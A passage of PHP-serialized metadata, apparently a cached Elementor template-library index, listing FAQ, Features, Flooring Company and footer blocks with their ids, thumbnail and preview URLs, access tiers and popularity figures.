5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_3.png\";s:12:\"tmpl_created\";i:1520443575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/faq-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"Faq\"]\";s:10:\"menu_order\";i:269;s:16:\"popularity_index\";i:319;s:11:\"trend_index\";i:327;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:556;a:21:{s:4:\"tmpl\";i:525;s:2:\"id\";i:5755;s:5:\"title\";s:5:\"FAQ 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_5.png\";s:12:\"tmpl_created\";i:1520443580;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/faq-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"Faq\"]\";s:10:\"menu_order\";i:271;s:16:\"popularity_index\";i:112;s:11:\"trend_index\";i:180;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:557;a:21:{s:4:\"tmpl\";i:526;s:2:\"id\";i:5764;s:5:\"title\";s:5:\"FAQ 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_5.png\";s:12:\"tmpl_created\";i:1520443582;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/faq-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"Faq\"]\";s:10:\"menu_order\";i:273;s:16:\"popularity_index\";i:338;s:11:\"trend_index\";i:474;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:558;a:21:{s:4:\"tmpl\";i:517;s:2:\"id\";i:5684;s:5:\"title\";s:5:\"FAQ 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_1.png\";s:12:\"tmpl_created\";i:1520443565;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/faq-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"Faq\"]\";s:10:\"menu_order\";i:274;s:16:\"popularity_index\";i:74;s:11:\"trend_index\";i:193;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:559;a:21:{s:4:\"tmpl\";i:518;s:2:\"id\";i:5693;s:5:\"title\";s:5:\"FAQ 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_1.png\";s:12:\"tmpl_created\";i:1520443567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/faq-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"Faq\"]\";s:10:\"menu_order\";i:276;s:16:\"popularity_index\";i:224;s:11:\"trend_index\";i:515;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:560;a:21:{s:4:\"tmpl\";i:548;s:2:\"id\";i:6053;s:5:\"title\";s:10:\"Features 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_5.png\";s:12:\"tmpl_created\";i:1520443645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:277;s:16:\"popularity_index\";i:179;s:11:\"trend_index\";i:463;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:561;a:21:{s:4:\"tmpl\";i:542;s:2:\"id\";i:5991;s:5:\"title\";s:11:\"Features 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_4.png\";s:12:\"tmpl_created\";i:1520443632;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:279;s:16:\"popularity_index\";i:135;s:11:\"trend_index\";i:265;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:562;a:21:{s:4:\"tmpl\";i:547;s:2:\"id\";i:6044;s:5:\"title\";s:11:\"Features 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_5.png\";s:12:\"tmpl_created\";i:1520443643;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:280;s:16:\"popularity_index\";i:70;s:11:\"trend_index\";i:163;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:563;a:21:{s:4:\"tmpl\";i:566;s:2:\"id\";i:6212;s:5:\"title\";s:11:\"Features 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_7.png\";s:12:\"tmpl_created\";i:1520443684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/features-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:281;s:16:\"popularity_index\";i:81;s:11:\"trend_index\";i:98;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:564;a:21:{s:4:\"tmpl\";i:567;s:2:\"id\";i:6220;s:5:\"title\";s:10:\"Features 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_8.png\";s:12:\"tmpl_created\";i:1520443685;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:282;s:16:\"popularity_index\";i:88;s:11:\"trend_index\";i:189;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:565;a:21:{s:4:\"tmpl\";i:541;s:2:\"id\";i:5983;s:5:\"title\";s:10:\"Features 3\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_3.png\";s:12:\"tmpl_created\";i:1520443630;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:283;s:16:\"popularity_index\";i:231;s:11:\"trend_index\";i:351;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:566;a:21:{s:4:\"tmpl\";i:540;s:2:\"id\";i:5974;s:5:\"title\";s:10:\"Features 4\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_3.png\";s:12:\"tmpl_created\";i:1520443629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:286;s:16:\"popularity_index\";i:69;s:11:\"trend_index\";i:181;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:567;a:21:{s:4:\"tmpl\";i:516;s:2:\"id\";i:5624;s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";i:1520443553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:287;s:16:\"popularity_index\";i:93;s:11:\"trend_index\";i:352;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:568;a:21:{s:4:\"tmpl\";i:515;s:2:\"id\";i:5615;s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";i:1520443551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:290;s:16:\"popularity_index\";i:41;s:11:\"trend_index\";i:119;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:569;a:21:{s:4:\"tmpl\";i:539;s:2:\"id\";i:5963;s:5:\"title\";s:10:\"Features 7\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_2.png\";s:12:\"tmpl_created\";i:1520443626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:291;s:16:\"popularity_index\";i:67;s:11:\"trend_index\";i:133;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:570;a:21:{s:4:\"tmpl\";i:565;s:2:\"id\";i:6204;s:5:\"title\";s:10:\"Features 8\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_6.png\";s:12:\"tmpl_created\";i:1520443681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:292;s:16:\"popularity_index\";i:217;s:11:\"trend_index\";i:223;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:571;a:21:{s:4:\"tmpl\";i:564;s:2:\"id\";i:6196;s:5:\"title\";s:10:\"Features 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_6.png\";s:12:\"tmpl_created\";i:1520443680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/features-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"Features\"]\";s:10:\"menu_order\";i:294;s:16:\"popularity_index\";i:106;s:11:\"trend_index\";i:113;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:572;a:21:{s:4:\"tmpl\";i:1033;s:2:\"id\";i:15033;s:5:\"title\";s:28:\"Flooring Company – 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/08/404.png\";s:12:\"tmpl_created\";i:1597739459;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/flooring-company-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:45:\"[\"404\",\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:296;s:16:\"popularity_index\";i:655;s:11:\"trend_index\";i:671;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:573;a:21:{s:4:\"tmpl\";i:1032;s:2:\"id\";i:15042;s:5:\"title\";s:32:\"Flooring Company – Archive\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Blog.png\";s:12:\"tmpl_created\";i:1597739084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/flooring-company-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:297;s:16:\"popularity_index\";i:320;s:11:\"trend_index\";i:275;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:574;a:21:{s:4:\"tmpl\";i:1031;s:2:\"id\";i:15017;s:5:\"title\";s:31:\"Flooring Company – Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Footer.png\";s:12:\"tmpl_created\";i:1597738933;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/flooring-company-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:48:\"[\"Flooring company\",\"Flooring website\",\"Footer\"]\";s:10:\"menu_order\";i:299;s:16:\"popularity_index\";i:323;s:11:\"trend_index\";i:192;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:575;a:21:{s:4:\"tmpl\";i:1030;s:2:\"id\";i:15007;s:5:\"title\";s:31:\"Flooring Company – Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Header.png\";s:12:\"tmpl_created\";i:1597738896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/flooring-company-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:48:\"[\"Flooring company\",\"Flooring website\",\"Header\"]\";s:10:\"menu_order\";i:302;s:16:\"popularity_index\";i:459;s:11:\"trend_index\";i:333;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:576;a:21:{s:4:\"tmpl\";i:1029;s:2:\"id\";i:15052;s:5:\"title\";s:36:\"Flooring Company – Single post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/08/Single.png\";s:12:\"tmpl_created\";i:1597738858;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/flooring-company-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:303;s:16:\"popularity_index\";i:392;s:11:\"trend_index\";i:226;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:577;a:21:{s:4:\"tmpl\";i:651;s:2:\"id\";i:7837;s:5:\"title\";s:9:\"footer 01\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.14.jpg\";s:12:\"tmpl_created\";i:1524582852;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/footer-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:305;s:16:\"popularity_index\";i:495;s:11:\"trend_index\";i:539;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:578;a:21:{s:4:\"tmpl\";i:647;s:2:\"id\";i:7937;s:5:\"title\";s:10:\"footer 010\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.5.jpg\";s:12:\"tmpl_created\";i:1524582665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-010/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:308;s:16:\"popularity_index\";i:185;s:11:\"trend_index\";i:115;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:579;a:21:{s:4:\"tmpl\";i:646;s:2:\"id\";i:7950;s:5:\"title\";s:10:\"footer 011\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.4.jpg\";s:12:\"tmpl_created\";i:1524582631;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-011/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:310;s:16:\"popularity_index\";i:244;s:11:\"trend_index\";i:203;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:580;a:21:{s:4:\"tmpl\";i:645;s:2:\"id\";i:7959;s:5:\"title\";s:10:\"footer 012\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.3.jpg\";s:12:\"tmpl_created\";i:1524582605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-012/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:311;s:16:\"popularity_index\";i:177;s:11:\"trend_index\";i:140;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:581;a:21:{s:4:\"tmpl\";i:644;s:2:\"id\";i:7982;s:5:\"title\";s:10:\"footer 013\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.2.jpg\";s:12:\"tmpl_created\";i:1524582468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-013/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:314;s:16:\"popularity_index\";i:209;s:11:\"trend_index\";i:212;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:582;a:21:{s:4:\"tmpl\";i:643;s:2:\"id\";i:7997;s:5:\"title\";s:10:\"footer 014\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/footer350.1.jpg\";s:12:\"tmpl_created\";i:1524582343;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/footer-014/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:316;s:16:\"popularity_index\";i:64;s:11:\"trend_index\";i:41;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:583;a:21:{s:4:\"tmpl\";i:693;s:2:\"id\";i:9119;s:5:\"title\";s:10:\"footer 